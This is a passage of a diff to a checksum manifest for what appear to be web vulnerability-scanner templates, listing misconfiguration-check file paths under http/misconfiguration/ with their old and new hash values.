http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml:e9c2df506482002ad133e20e3f2ed1bbdd23e71f http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:1ca7988289273362625842141e097c5876061955 http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:e61facf99877385cb61fcb7b933e56b047e4e497 -http/misconfiguration/aem/aem-secrets.yaml:5db4fec51ac245eb2397357fb5af3a2c3d187f56 +http/misconfiguration/aem/aem-secrets.yaml:033083bf6990af07870e13e0b1b79f08c1c04ff7 http/misconfiguration/aem/aem-security-users.yaml:7d1e1b509a43c14a29396333ac4af0e5d117bc1b http/misconfiguration/aem/aem-setpreferences-xss.yaml:9db8ca17fe2be00d5f8063d046665ccf609e6e94 http/misconfiguration/aem/aem-sling-userinfo.yaml:e5934b740260d6d78dc98cf90a0f308bac69cc7b @@ -3726,27 +3855,29 @@ http/misconfiguration/aem/aem-xss-childlist-selector.yaml:2a659cded900d5bb75b01f http/misconfiguration/airflow/airflow-debug.yaml:73ecb206850cdff42956b7fb2e410aa405110df5 http/misconfiguration/airflow/unauthenticated-airflow.yaml:c6f3ed35ccd4898737da5e4f35fecb836dd404a8 http/misconfiguration/akamai/akamai-arl-xss.yaml:76466843457c1c864f583b33875620e9a0106038 -http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:8bf7d6807b474fc3a347b8cf9ba9764b0f032707 +http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:0bc9e0b6791382452bb5e7452d50a83709767476 http/misconfiguration/alibaba-mongoshake-unauth.yaml:0c90ccc157483e024b366d1d3c0b9f9b03df19d7 http/misconfiguration/ampache-update-exposure.yaml:d93e7134fd67d9baca3f51fd61bd4e3cdafccde5 http/misconfiguration/ampps-dirlisting.yaml:982e53209ce4dee232ae334802e91796fa74772d http/misconfiguration/android-debug-database-exposed.yaml:73a7ac140bebb31fff693ea3bc512ba1b614ef6c http/misconfiguration/apache/apache-filename-enum.yaml:85a6708476a1ce4dae2fbb03fcb70fe82a756b36 http/misconfiguration/apache/apache-hbase-unauth.yaml:9b423614dad084bca22878d48987c6355e749293 -http/misconfiguration/apache/apache-nifi-unauth.yaml:ac5ba10109688b734832a3d5fcb6aacd03a0b077 +http/misconfiguration/apache/apache-nifi-unauth.yaml:c4b5d125120c2b1614e78b978cf1e8638ccdb75b http/misconfiguration/apache/apache-storm-unauth.yaml:ec48391d69726d11a50250d901a5f6ca1568fd66 -http/misconfiguration/apache/apache-zeppelin-unauth.yaml:cb03981ab94ab3b4fbb7374e95a1292b920c7017 +http/misconfiguration/apache/apache-zeppelin-unauth.yaml:2a441f5be73b1674fec1a40096ebdb0dcb115e10 http/misconfiguration/apache/kafka-manager-unauth.yaml:4164e70b56cc9063edd555b9331ac3bb12aa7f05 http/misconfiguration/apache/tomcat-pathnormalization.yaml:aded04d307fd62037d53fe11d1610cb3f3ea6c46 http/misconfiguration/apache-drill-exposure.yaml:792715f62979f623e4e1d8cd0ed034ff2eb01afc http/misconfiguration/apache-druid-unauth.yaml:f733c030df890a6861a1ae3660266e07c762298e -http/misconfiguration/apache-struts-showcase.yaml:e601e04789a8ce95e4f268f9bc91edec4873275a +http/misconfiguration/apache-impala.yaml:8d74afa76cb797f3a7bf3c986631d7e93bd3487b +http/misconfiguration/apache-struts-showcase.yaml:088299aab3e71e7e4f0873ba52b72e9f69ad1f3f http/misconfiguration/apc-info.yaml:2862c2dd33ec7fc5342f56dd75ed482e68a4302f -http/misconfiguration/apollo-adminservice-unauth.yaml:6c9708fde596d446f2fbb5190b86a0720e3d1562 +http/misconfiguration/apollo-adminservice-unauth.yaml:e78257a11db860ac6a1d34df3f41fed2d99cbd45 http/misconfiguration/application-yaml.yaml:37fec8f5574c0f3cee8b63b9fcf3db093ab3fefb http/misconfiguration/artifactory-anonymous-deploy.yaml:93f62d1f62bb2f2e4939f3fc8a089289b81827d7 http/misconfiguration/aspx-debug-mode.yaml:0a6e3fe30d7e5c439b7a854541bb7502a7f56733 http/misconfiguration/atlassian-bamboo-build.yaml:71cb19c46cafbebd7533e98b88d45227731727eb +http/misconfiguration/aws-ec2-status.yaml:f52f9d1feaf736a3728ae0c95d266d575fad9b77 http/misconfiguration/aws-object-listing.yaml:56e839cf2c6295357e747db2028d4a28a84f60f0 http/misconfiguration/aws-redirect.yaml:bfde256899ae55a362ca03c48eea09bf061996b3 http/misconfiguration/aws-s3-explorer.yaml:d469f865c937b7091ea892357924bd18a112c1ae @@ -3755,14 +3886,16 @@ http/misconfiguration/awstats-listing.yaml:cefec72eb3bf609f09779109eef39dfa9e627 http/misconfiguration/bitbucket-public-repository.yaml:3ae328db3b76977394dca6df4b06d9d1a2402223 http/misconfiguration/blackbox-exporter-metrics.yaml:1b007870d9cc2e5889ed9f24499dc5a65b0b7f6d http/misconfiguration/bootstrap-admin-panel-template.yaml:e0a8f253df0d0977c3445b31f8e5c30c7d98e94b +http/misconfiguration/bravia-signage.yaml:112b33d9332d3e80f0871c37adf7f3736d986d0f http/misconfiguration/browserless-debugger.yaml:d604fd376e91cd89e1dddc043a808cbb5cbc6983 http/misconfiguration/cadvisor-exposure.yaml:b474265e13c72987988f727798d64cfcdd02494c http/misconfiguration/cgi-test-page.yaml:ca7f843fe1d569a61743f154508f03aed7acddf5 http/misconfiguration/clockwork-dashboard-exposure.yaml:a6f1daed673e5f6694e6dc5938ca5df5d8ccb394 http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e94 http/misconfiguration/cloudflare-image-ssrf.yaml:5cde64e35a786a2fed9498626ebaaea5429f7997 -http/misconfiguration/cluster-panel.yaml:8c185448a1b38c3f7af159249119d9e84c417081 +http/misconfiguration/cluster-panel.yaml:e53352d353b191f9b61b613fcc89e971284d03fb http/misconfiguration/cobbler-exposed-directory.yaml:b4ff1d7d46d661f7e27d23879280633028c1dd3d +http/misconfiguration/codeigniter-errorpage.yaml:97f2f5b97183a0fc700e723bdac5f59f4d184055 http/misconfiguration/codemeter-webadmin.yaml:3ad9e6225800a6a4213d5deaab056aec3df3a4f4 http/misconfiguration/codis-dashboard.yaml:7bf49a01e5f1776e0d0e1153a56a61b3960d508a http/misconfiguration/collectd-exporter-metrics.yaml:54946544cad933293c860c88a6178f1af904651b @@ -3777,7 +3910,7 @@ http/misconfiguration/debug/ampache-debug.yaml:f821e8ca3af7b0fda21962a838544e778 http/misconfiguration/debug/bottle-debug.yaml:b6392acf9da817a2bef4a12803d622917cc81772 http/misconfiguration/debug/flask-werkzeug-debug.yaml:175e2bd8f7f2ab34d9ecb413beb252655d9a3ef3 http/misconfiguration/debug/github-debug.yaml:ecf98218fcacdac655b557121fcf3715e4bb8159 -http/misconfiguration/default-spx-key.yaml:f7c00a299122c55af842914019a94c2bbec4644c +http/misconfiguration/default-spx-key.yaml:b8815c33c65aa92ff896625d5fa8a322296205e6 http/misconfiguration/deos-openview-admin.yaml:1e807c09de91e0273bd21f530149a2b238c6cf7a http/misconfiguration/dgraph-dashboard-exposure.yaml:cef311f038bfb10dce20b822ce2d604be1a5b04e http/misconfiguration/django-debug-detect.yaml:02b3b7097316015f7437c6ec2688b9716681083a @@ -3786,6 +3919,7 @@ http/misconfiguration/docmosis-tornado-server.yaml:de29fa477373aa022f20a04fa9ac1 http/misconfiguration/druid-monitor.yaml:0f001da6c20012aff46b1537323696d5e1a41e28 http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:fe083bb982103879c62938629378e41a704fe657 http/misconfiguration/drupal/drupal-user-enum-redirect.yaml:71c8edfca37ff548899ac75de2fae1f02b768a01 +http/misconfiguration/dynamic-container-host.yaml:381d4e6ece0fa9bdf13b30f72155be88d25b3b79 http/misconfiguration/ec2-instance-information.yaml:6293ca79638118a5c045fd01b5c3bcd9e5523ee3 http/misconfiguration/elastic-hd-dashboard.yaml:c6255bd33a31115ce354696c6602a8095b6159e4 http/misconfiguration/elasticsearch.yaml:7ecd73220a854d101ba4b2d38c0e18f871c55646 @@ -3802,9 +3936,11 @@ http/misconfiguration/exposed-kibana.yaml:6ee98c4f4f81145e510b0c1df9ae407cd20203 http/misconfiguration/exposed-service-now.yaml:911c997fbb6a866aa14121d349630170a3baa509 http/misconfiguration/exposed-sqlite-manager.yaml:7403a0849ca8cea0dcf63e664e0f574c9104c4a8 http/misconfiguration/express-stack-trace.yaml:f87f460eb04297d0ecc7e6fd0ee04502880e6064 +http/misconfiguration/flask-redis-docker.yaml:4ebb9f69d955ee1e0b71cf14d41f5f977106f642 http/misconfiguration/formalms-install.yaml:3146478146f106551371ec66ec86e7ad3c3022a3 http/misconfiguration/front-page-misconfig.yaml:7baa1afa482ebcacffaed682c39ecfbb91cbf6fd http/misconfiguration/ganglia-cluster-dashboard.yaml:a065363e9259aab0d49bddb760688cfda669b9a7 +http/misconfiguration/genieacs-default-jwt.yaml:8bd6683d4adc6ee59444e52314b1b04c382750f0 http/misconfiguration/git-web-interface.yaml:f0b4732a2bfa25ca494e66c98a19dabdb5cd8bbb http/misconfiguration/gitea-public-signup.yaml:c076527b0e1e9496ade22db8a21ba4374545a0f3 http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:a13fe47ff257f28efd52db5f61032de455fcb8f2 @@ -3820,12 +3956,14 @@ http/misconfiguration/gocd/gocd-cruise-configuration.yaml:2d748f57624694d735a38c http/misconfiguration/gocd/gocd-encryption-key.yaml:1da3c9a20517a4ad0637d316b73bc15b64af05be http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:da1a707bedef3b071d997f46bd9f110a3b563212 http/misconfiguration/google/insecure-firebase-database.yaml:d1b7576ba8cb088abf66adc99d2a4add5b0c1801 +http/misconfiguration/gopher-server.yaml:351b05fde081a9ff54973abdf94d8410b23b68cc http/misconfiguration/grafana-public-signup.yaml:54130d5dc48440e43f62a8531d5356bd235878cf http/misconfiguration/graphql/graphql-alias-batching.yaml:4aeddcefb2741725c3dfcb58b712e9e2732d484c http/misconfiguration/graphql/graphql-array-batching.yaml:f8195b045be9e30fa9215b4a1bb3901fdb29236c http/misconfiguration/graphql/graphql-field-suggestion.yaml:774a6f99933e22ea8e3c0a6987748d32162d71db http/misconfiguration/graphql/graphql-get-method.yaml:b2f6cd219ca2117a2fab9a9145c488b89a600acf http/misconfiguration/graphql/graphql-playground.yaml:791736c821562ea09fef7b49bd146de709c47ec1 +http/misconfiguration/grav-register-admin.yaml:8a5655b418498523e10656cabb527ab75b00d6a7 http/misconfiguration/hadoop-unauth-rce.yaml:3d39991821296cf7d1aba075286ee111f25991b2 http/misconfiguration/haproxy-exporter-metrics.yaml:bed30cee7f8cfa31c5896170da6c1c55dc64ae2e http/misconfiguration/haproxy-status.yaml:e64b16ad4d2303dccf83416862651941caeaea72 @@ -3835,11 +3973,11 @@ http/misconfiguration/hivequeue-agent.yaml:a444969d972e8def5e7eb4061b39fdc04c552 http/misconfiguration/hp/unauthorized-hp-printer.yaml:dbab24fce13d0f5cbb4d16a788ab39f4fe950444 http/misconfiguration/hp/unauthorized-printer-hp.yaml:d372cb189471e659b11acf0fd474d3968077f094 http/misconfiguration/hpe-system-management-anonymous.yaml:65d4cb03ab85f37ac509567200ce902cfd566963 -http/misconfiguration/http-missing-security-headers.yaml:72de8309ec1ea7ba01f7a9d8fdd99756bf0e7d41 +http/misconfiguration/http-missing-security-headers.yaml:a6d752806c774d36b6fb5fdd9d5fded9f764f8b7 http/misconfiguration/httponly-cookie-detect.yaml:c64d772ea2b1baebf90eb45d17b948946ab4e601 http/misconfiguration/ibm-friendly-path-exposure.yaml:4a0c016c96752c544532427f11a18deb106111a3 -http/misconfiguration/ibm-websphere-xml.yaml:b57a36f1d97d3a3aed69e79ce58eff39f61f2cfb -http/misconfiguration/iis-internal-ip-disclosure.yaml:12571416d16560d7804e1891a1e7d107bf83c66a +http/misconfiguration/ibm-websphere-xml.yaml:b2d99fde3c919e278194f8824c900fb1038b67ea +http/misconfiguration/iis-internal-ip-disclosure.yaml:bd8ba07fe291bb84914ed2b33c03bc195399daed http/misconfiguration/installer/acunetix-360-installer.yaml:08978fd91dcf0249d0d50ec692ea165e73a1342d http/misconfiguration/installer/ampache-music-installer.yaml:28e4b0bedc08cbf5210559e43f440e444ad35820 http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d57c2d7a7b8f2e3423835cc75d80 @@ -3864,14 +4002,14 @@ http/misconfiguration/installer/getsimple-installation.yaml:47c683728da500f536d8 http/misconfiguration/installer/gitea-installer.yaml:30a0dc762499cbfb1c8ac2d1b3dfeb0148a619e5 http/misconfiguration/installer/gogs-installer.yaml:e4b17e837c63e9fc4d08c858d653c60d6aabf2c3 http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2502bd4a40039ff5c1991 -http/misconfiguration/installer/indegy-sensor-installer.yaml:78ee3f9ce20511a7e119b98e0ed33452f3a1b422 -http/misconfiguration/installer/jira-setup.yaml:ef559469473370ea9ef20585868793b153eaeb75 +http/misconfiguration/installer/indegy-sensor-installer.yaml:c4b65b906536d0e71d9128a43b1bbf31c7c6ad55 +http/misconfiguration/installer/jira-setup.yaml:98368f306cef91d92ecd53725eca807b2cf1af2a http/misconfiguration/installer/joomla-installer.yaml:9f89a6d16c8fef98b9a4de986d22768b2aa76895 http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99344948bfcd4c854335 http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2 http/misconfiguration/installer/magento-installer.yaml:c6e440e4873876f64c732177fcf84521d8677926 -http/misconfiguration/installer/magnolia-installer.yaml:7d4f3393be971333b326c64fcb4402b041e9a46c +http/misconfiguration/installer/magnolia-installer.yaml:5dac5126d20064986e1b325942fea208a897bdd8 http/misconfiguration/installer/matomo-installer.yaml:11b8fc5a1e88dd75aedcacd4d062f84ec57b533d http/misconfiguration/installer/mautic-installer.yaml:27560145f4bac624acc11e51ab63162348de5beb http/misconfiguration/installer/mcloud-installer.yaml:0eb7861b9517b7c910d2cdfdca97ddf3612a77a3 @@ -3902,6 +4040,7 @@ http/misconfiguration/installer/server-monitor-installer.yaml:b76832516a1fddb310 http/misconfiguration/installer/shopify-app-installer.yaml:0fd1dfe851c0fe1a077960bff792431845ac2d6d http/misconfiguration/installer/smf-installer.yaml:17fb2697893767a0fd0185367fa9d46b20ab1f0f http/misconfiguration/installer/sms-installer.yaml:9f0f50c973150c05748646e0aa126699737d4143 +http/misconfiguration/installer/spip-install.yaml:9b3f0a7183cd6165a6878c931e175be44188007c http/misconfiguration/installer/suitecrm-installer.yaml:cd83c905b266af72a7de369f39cf1a8d35f15555 http/misconfiguration/installer/sumowebtools-installer.yaml:80de795776d6c5db88e0cdeaf7bde126d00db98a http/misconfiguration/installer/tasmota-install.yaml:1fa030bacda853a852a5737e603cc70522e27c51 @@ -3915,15 +4054,15 @@ http/misconfiguration/installer/uvdesk-install.yaml:320a11b9cea52323a096a72743f4 http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c128f1a51a850e4f http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927 -http/misconfiguration/installer/wp-install.yaml:15481e7899e72d65db7b08010dd90703654762a6 +http/misconfiguration/installer/wp-install.yaml:ea9ba75741b72152f31680e16dfbdaae3c1012af http/misconfiguration/installer/zenphoto-setup.yaml:77adefadea89cca423b2f375b41eaf99f8e0ea86 http/misconfiguration/iot-vdme-simulator.yaml:6769c64d1927c4686a8b6c1235c6ce48e5ffbd93 http/misconfiguration/jaeger-ui-dashboard.yaml:efec14b7239b7f4eff7378c2952dba84a6e9e112 http/misconfiguration/java-melody-exposed.yaml:b60c1fcaea251d9571ad67d653137cbdcdafc5f3 http/misconfiguration/jboss-status.yaml:8c815279d70694599f03ed420f7a54230af0e920 -http/misconfiguration/jboss-web-service.yaml:89f27b248001da35b96ae2d3e16f7746bff787eb +http/misconfiguration/jboss-web-service.yaml:d231a296121beabbf9dbde3e5be75d3b574b2092 http/misconfiguration/jenkins/jenkins-openuser-register.yaml:ec2082d6058f4ece4d1ae40dede0ada1072ecb9c -http/misconfiguration/jetty-showcontexts-enable.yaml:9f6cb9387d1bdb7f67058d7d6b660e46f3bdbe99 +http/misconfiguration/jetty-showcontexts-enable.yaml:188720b15a7b5d97cf4ac43c613d830916cc7521 http/misconfiguration/jolokia/jolokia-info-disclosure.yaml:aed816f1136f44813a7313d99f07aa964f09a72d http/misconfiguration/jolokia/jolokia-list.yaml:6374c8133a97551af6a9180f3e912f5000502939 http/misconfiguration/jolokia/jolokia-mbean-search.yaml:c266bca56fdc6169e0d5a1ea458eae322f16fe4d @@ -3933,15 +4072,15 @@ http/misconfiguration/jupyter-lab-unauth.yaml:b550a9f5357574509564c0e86ccc938f7a http/misconfiguration/jupyter-notebooks-exposed.yaml:aa2e7822ab7f97dae8e3e6a6d99227b143e58c6a http/misconfiguration/kafka-cruise-control.yaml:fdfc82fa91518cbf7f33b126a2467d9e7888c36a http/misconfiguration/kubeflow-dashboard-unauth.yaml:b588f26c0ed0006cc2ec80cd9a0fd8cef366dbe4 -http/misconfiguration/kubernetes/kube-state-metrics.yaml:b66bce9ef9c223a48f133ba5482a19bfd2c49e69 +http/misconfiguration/kubernetes/kube-state-metrics.yaml:c979e984cd5bfc6b3fc6887230c34cbc6b6af304 http/misconfiguration/kubernetes/kubernetes-metrics.yaml:f96a4bf15df1ff57ae812c2a3d9660b84516e908 http/misconfiguration/kubernetes/kubernetes-pods.yaml:09bdbcfb2fb3ae5894203940a9ddd6211c91d617 http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:836f4207ec2f160a693f12ba6210860a37e6d4dc -http/misconfiguration/kubernetes/unauth-etcd-server.yaml:eda3eb4de225fa1cb48e4ed9c8625f109e34b7c7 +http/misconfiguration/kubernetes/unauth-etcd-server.yaml:69a99edc7aca3e3b4b109f2593890947a1826bf5 http/misconfiguration/laravel-debug-enabled.yaml:d5c61627ffc6311ffe3ad85727c090ad2334fdc5 http/misconfiguration/laravel-debug-error.yaml:ac66a50f5cc0e164624a17be0f2e31fb16a0951a -http/misconfiguration/laravel-debug-infoleak.yaml:26028f7fba276d645184cd4c79542d05c04d9439 -http/misconfiguration/laravel-horizon-unauth.yaml:b5c25d901a0b5e0ef99871ebcd1a989cba8cb152 +http/misconfiguration/laravel-debug-infoleak.yaml:bde6e32a615f9c62a18c790890ed33a3dd61496b +http/misconfiguration/laravel-horizon-unauth.yaml:ad483217cb2237fd2b8c4d7bf637efeae18dc8e9 http/misconfiguration/libvirt-exporter-metrics.yaml:dd144d0dcdf6bb6ab2994fd0323a38726f2a7440 http/misconfiguration/liferay/liferay-api.yaml:9bcf562b0076a0ed474bd0be00c4af6b49f68c52 http/misconfiguration/liferay/liferay-axis.yaml:339ee67265e419187d32464190e2cffbb95b115a @@ -3953,13 +4092,13 @@ http/misconfiguration/lvm-exporter-metrics.yaml:f72240561614eb166a5b2379534c4b6a http/misconfiguration/manage-engine-ad-search.yaml:c0a1098f444eacd9702cdac2fcabe4f92514e8d9 http/misconfiguration/misconfigured-concrete5.yaml:fbd7e1060eeb23bec6e4331af978576619e8a704 http/misconfiguration/misconfigured-docker.yaml:2bef55d681dbce2029c69b355a22077569fcc115 -http/misconfiguration/mlflow-unauth.yaml:d0aab5b2b1ee6a571bfd45bbc7fba71c76548292 +http/misconfiguration/mlflow-unauth.yaml:b5d885326ff8ccd4dfaa18fa6ec8780804c0ce8b http/misconfiguration/mobiproxy-dashboard.yaml:06aca093a37f1edafb48bf3deaf993188afdb87b -http/misconfiguration/moleculer-microservices.yaml:1a37fd700ddf97792e9207621caad799b109bb28 -http/misconfiguration/mongodb-exporter-metrics.yaml:bc1d75f72c314b8c132036a683eb2626fdf12299 -http/misconfiguration/multilaser-pro-setup.yaml:38b63953f572be175cc4df517c2cc6def7bab937 +http/misconfiguration/moleculer-microservices.yaml:504cfc24010ed454d66e014e62e280feee68d516 +http/misconfiguration/mongodb-exporter-metrics.yaml:2a667033dbb359e3baef08dab7585f473c8b6d49 +http/misconfiguration/multilaser-pro-setup.yaml:ee5a7afe337aa891ced4039755cb587246e67057 http/misconfiguration/mysqld-exporter-metrics.yaml:54cce7be2e1039b6eeec7113fe8f54d45bb3360f -http/misconfiguration/nacos-authentication-bypass.yaml:40d5f8bf805c24971c027940cf0bf6634d5465e2 +http/misconfiguration/nacos-authentication-bypass.yaml:0563da3bf8c47700170d9bbf77effe33b7602092 http/misconfiguration/namedprocess-exporter-metrics.yaml:fb265ee19e4c47acbcda06000fd3b1bd0cf2500c http/misconfiguration/nextcloud-install.yaml:2bd18779bfb541cb04188818770c362ea6007b1d http/misconfiguration/nginx/nginx-status.yaml:6d4aeeb08f9a6bc87bb62744a580a7d29d21016f @@ -3969,12 +4108,14 @@ http/misconfiguration/node-exporter-metrics.yaml:b2ac2928da746a40c84fe794caeaa5c http/misconfiguration/nomad-jobs.yaml:ff399ef954a11469322a4ec944e2bbc61ab61ad5 http/misconfiguration/ntop-panel-exposed.yaml:389ab249b9e71fd45e7cc58a7c35244f9eb1f222 http/misconfiguration/ntopng-traffic-dashboard.yaml:b09ba6388a5425b6722bb49ecde7ad16f8784079 +http/misconfiguration/odoo-unprotected-database.yaml:8489b611976aed298411d5846992107b6903cf53 http/misconfiguration/office365-open-redirect.yaml:298b9e5d05c5f3f48326f0b1ffb739e656d9450d -http/misconfiguration/oneinstack-control-center.yaml:f1fed963bbec6f3468ab355ce82e1f789a2448f5 +http/misconfiguration/oneinstack-control-center.yaml:a2bc853b75f313d36ee57e710fa9834e958587aa http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml:df0fbc13935c2cbcd2ed1859cc52b5810085ea59 http/misconfiguration/openbmcs/openbmcs-ssrf.yaml:b2bbdd57e47915d7648d15f07766b0c1b2afeff5 http/misconfiguration/pa11y-dashboard.yaml:e23d85a4a1bdbaff222f11cc73d9f2a9049e1661 http/misconfiguration/pcdn-cache-node.yaml:1d1335fe30f43e57bf9fc687546b663d2e2e2b89 +http/misconfiguration/perfsonar-toolkit.yaml:a60dc07b4b9012f7ac0788468f48e1118e1ad86a http/misconfiguration/pghero-dashboard-exposure.yaml:1d92b417b20136208d33b9950d81460068ffef72 http/misconfiguration/php-errors.yaml:d510eb73b0c239cf296811301a915c51a5340530 http/misconfiguration/php-fpm-status.yaml:9bd291a90d9fe1976eba650da3b8723b3f38d0fb @@ -3984,6 +4125,7 @@ http/misconfiguration/phpmemcached-admin-panel.yaml:cefd28e84c200e8de48a426caf1a http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml:75d60dd180db5023e5ada989177be14f289cd2d1 http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml:1deb52a958eb06afd730305174655379e8fa59ce http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml:89f77d6a91231e1658702e548cf03f414b1c3c73 +http/misconfiguration/phpnow-works.yaml:74b19a2efc60d0024415e34b7ccea5602932c21e http/misconfiguration/pinpoint-unauth.yaml:8d98e829ccb397ff2a6f4e2dd278ae033309bff0 http/misconfiguration/postgres-exporter-metrics.yaml:06b7309b1d0714ec7fb36f8b120951e711893c8e http/misconfiguration/private-key-exposure.yaml:0b37d7644d35bf0653ec163c40ad88dc8f25b2bb @@ -3993,7 +4135,7 @@ http/misconfiguration/prometheus/prometheus-flags.yaml:8fd4a885790d3ed82dc12de3f http/misconfiguration/prometheus/prometheus-log.yaml:644a43bf1feaa9733bdcd756b60ec9e2aa3806b7 http/misconfiguration/prometheus/prometheus-targets.yaml:f0916980c60f56c283147404674599ee79ae27d8 http/misconfiguration/proxy/metadata-alibaba.yaml:ba1dd0862f0b2b6bca8e88ce724fcb64ab1f7911 -http/misconfiguration/proxy/metadata-aws.yaml:b032d2cf6f09532106bde587d66c077c950498a1 +http/misconfiguration/proxy/metadata-aws.yaml:cafd5319a94c654d7de59e8a88438d9cb766d060 http/misconfiguration/proxy/metadata-azure.yaml:b7651276f7a1316b7e9ee10d1977e61bdc26a9a0 http/misconfiguration/proxy/metadata-digitalocean.yaml:41276b057ad56ad2eeb95acd02ed58e0c7fc6a1b http/misconfiguration/proxy/metadata-google.yaml:f3ce729384eba1a220c57a7b133254fb9a0424b2 @@ -4013,7 +4155,7 @@ http/misconfiguration/rack-mini-profiler.yaml:7469e09887f0d6e3a453af9b9bc599709a http/misconfiguration/ray-dashboard.yaml:4a844cbdf0ec73c2ced7e19e34fe634d7e586a46 http/misconfiguration/rekognition-image-validation.yaml:5a73ec3e44d8e8a2cef2a3139c78b86664230db6 http/misconfiguration/rethinkdb-admin-console.yaml:426ecad708ddc90b0b73e9a679adcd90195fa3bb -http/misconfiguration/roxyfileman-fileupload.yaml:b797b85474b123f836dc0f692a685008158d40a4 +http/misconfiguration/roxyfileman-fileupload.yaml:d8350c9f8010b77b1476a9c4ea5dda30907cf253 http/misconfiguration/s3-torrent.yaml:73d011347bd23ca9ff810e40b211d9bda3a19a12 http/misconfiguration/salesforce-aura.yaml:8bed81797f75a8c742829f07c1a5903811a1872c http/misconfiguration/sap/sap-directory-listing.yaml:cf0cdfa1703f2b72c477c163ea20cd61ff168f94 @@ -4026,10 +4168,11 @@ http/misconfiguration/service-pwd.yaml:c2e394b6bfbc9019a0b1d2eb1000bc64f939f6f7 http/misconfiguration/setup-github-enterprise.yaml:3ccac795422811635983562f2be8d7f135365d55 http/misconfiguration/shell-history.yaml:79a5aa9e947fc3967e3f0d01e0072e5cbb020e5b http/misconfiguration/sitecore-debug-page.yaml:f1bd75044039fcf386f063863ec19da7cbd61ef4 -http/misconfiguration/sitecore-lfi.yaml:e1515f798ee7bda79bd977be2ecf47130746328e +http/misconfiguration/sitecore-lfi.yaml:a84b02ce16690a090660f5e1f953e6effa3401c6 http/misconfiguration/skycaiji-install.yaml:db8fa1743c9152bc0cbda2c3e2fcaac1f93f17ac http/misconfiguration/slurm-hpc-dashboard.yaml:3027793c277d52184a21f3b3f7475f4b2d293c3f http/misconfiguration/smarterstats-setup.yaml:eb3f0f9cdd11255b5ed687641638274f50529e15 +http/misconfiguration/smokeping-grapher.yaml:ac670f706687c77b750a9c87c4c33d19b7fb5212 http/misconfiguration/solr-query-dashboard.yaml:ea7cd78c37bbddbc9cc1da4cb490f42363bdbf5c http/misconfiguration/sonarqube-public-projects.yaml:e9486ffa86b355f1f55a8df80382304873664b0d http/misconfiguration/sony-bravia-disclosure.yaml:eb55d61f0b5fc907b2e5ca2796b80097279fabe7 @@ -4048,7 +4191,7 @@ http/misconfiguration/springboot/springboot-features.yaml:7bd0bc08ee5c3befdee90c http/misconfiguration/springboot/springboot-flyway.yaml:b438b02711d6e303f72981d4a63d5ecd15340c44 http/misconfiguration/springboot/springboot-gateway.yaml:0a54cd12a2aa005de70768b331426e0cc2de4121 http/misconfiguration/springboot/springboot-health.yaml:18d55584734a589d2f94ae343c4e9d2d0bd9ae05 -http/misconfiguration/springboot/springboot-heapdump.yaml:188d2fd68f67cf56b85e1df61e322fac085c40ac +http/misconfiguration/springboot/springboot-heapdump.yaml:cffd9ad7f0891ccfa469ec2bae1aaa4e568dde19 http/misconfiguration/springboot/springboot-httptrace.yaml:cbde8679338a79e01747e203fa670b7105414fff http/misconfiguration/springboot/springboot-info.yaml:d004cdd801ceb5ea72370ed0351c7dbf23f1cc0b http/misconfiguration/springboot/springboot-jolokia.yaml:45d531753495c45322f3f741c61f33c5d87ac46f @@ -4062,19 +4205,20 @@ http/misconfiguration/springboot/springboot-scheduledtasks.yaml:242326667d423683 http/misconfiguration/springboot/springboot-status.yaml:562e3b6709c078a061fe7cd8a11d6081c640bbee http/misconfiguration/springboot/springboot-threaddump.yaml:d63a63290ce0dbbc9f29eb00197ca217719b3f5b http/misconfiguration/springboot/springboot-trace.yaml:b3b23cdd38d4bdc4d716edc24a5de3b6e167738b -http/misconfiguration/sql-server-report-viewer.yaml:f23f3ce32ac43e583df1fb6399c7e2d86e1c027d +http/misconfiguration/sql-server-report-viewer.yaml:0dc7183af1936e4d2c06c88d7ccc396be613f4f9 http/misconfiguration/ssrf-via-oauth-misconfig.yaml:6f05d16bc3aa3d80c7131fe9db239946af77b707 -http/misconfiguration/struts-ognl-console.yaml:59795826e38d569ec0f1adee42c3fe7803c4f043 +http/misconfiguration/struts-ognl-console.yaml:1225dd9ba75155b280d8cc93373506d58a87f4a9 http/misconfiguration/symfony-debug.yaml:ca5f63291d245f459ae3ddaacaf85d68ee421eee http/misconfiguration/symfony-fosjrouting-bundle.yaml:d9281ad78746d457a096ae1cb89179326b9a3bf2 -http/misconfiguration/syncthing-dashboard.yaml:c74d1f36636cafafb972090a2c7232887a10d6d5 +http/misconfiguration/symfony-fragment.yaml:6a303fdc19cb0d32f0395e4895d8a0ec2083f9b9 +http/misconfiguration/syncthing-dashboard.yaml:c956550e88203d725008168ba0762d6edb130b47 http/misconfiguration/system-properties-exposure.yaml:23b3f57cd99b2a12e9fe90ad784540046d185772 http/misconfiguration/tasmota-config-webui.yaml:30daccec8874bca1ddecc352bfd983a9b8ecaa04 http/misconfiguration/tcpconfig.yaml:87e1d7dd5d7b1f2adfe2673114b7ee0e6866f665 http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml:fdf6891f3c35af86606f5361f706671475417d49 http/misconfiguration/teamcity/teamcity-registration-enabled.yaml:eb21ea79357223c551327cf978e7cae984be4974 